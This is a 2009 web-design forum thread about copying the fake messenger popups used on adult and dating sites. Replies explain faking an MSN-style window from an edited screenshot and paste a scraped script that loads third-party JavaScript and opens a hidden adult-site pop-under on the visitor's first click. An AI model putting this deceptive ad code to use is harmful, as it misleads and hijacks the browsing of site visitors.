Fake messenger popups on adult/dating sites? JavaScript?

Discussion in 'HTML & Website Design' started by Kerosene, Apr 17, 2009.

    Does anyone know where I can get the JavaScript (or whatever) that makes those slide up messenger windows that a lot of adult/dating sites use?

    I don't even know what to Google for.

    Yeah. But I want to make my own. I had a look at the JavaScript source for that page, hoping that I could rip it, but it was all a bit much for me.

    Anyone know where I can pinch some JavaScript to make it happen?
    Maybe I should have posted this in the JavaScript section of DP.

    Well its actually just a javascript to pop up images, and the MSN lookalike is just an image...u can just get one by screenshotting when someone comes online and use an image editing tool to add whatever u want, PM me and i can help u with it...

    as for the javascript, here's wat i found from that site:

    <script type="text/javascript"><!--
    a=document.getElementsByTagName('A');for(i=0,m=a.length;i<m;i++)a[i].onfocus=function(){this.blur()};//--></script><script language="javascript" src="http://js.peepfinder.com/dff198d8b3db4b6e7aa7bc176d83407d.js"></script><script>var puShown=false;function doOpen(url){if(puShown==true){return true}win=window.open(url,'ljPu','toolbar,status,resizable,scrollbars,menubar,location,height=760,width=800');if(win){win.blur();puShown=true}return win}function initPu(){if(document.attachEvent){document.attachEvent('onclick',checkTarget)}else if(document.addEventListener){document.addEventListener('click',checkTarget,false)}}function checkTarget(e){if(!getCookie('popundr')){var e=e||window.event;var win=doOpen('http://creatives.livejasmin.com/iframes/s/sl/slutload2/slutload.html?psid=ed_slutunder&pstour=t1&psprogram=REVS&site=jsm');setCookie('popundr',1,24*60*60)}}initPu();</script>

    HTML:
    I suppose you have basic information of html and javascript, so just download the JS file, and edit the links and all and WOILA, you just got urself advertising :p

    <HTML>
    <Head>
    <Script Language=JavaScript>

           var xV1 = 0;
           var xV2 = 0;

           function stayHome(){

                   nV = document.body.scrollTop;
                   document.getElementById('isFloat1').style.top = xV1+nV;
                   document.getElementById('isFloat2').style.top = xV2+nV;
           }

           function init(){

                   xV1 = document.getElementById('isFloat1').offsetTop;
                   xV2 = document.getElementById('isFloat2').offsetTop;
           }

           window.onload=init;
           window.onscroll=stayHome;

    Try using the firebug addon for firefox. it will help you dissect this script and find out how it works.
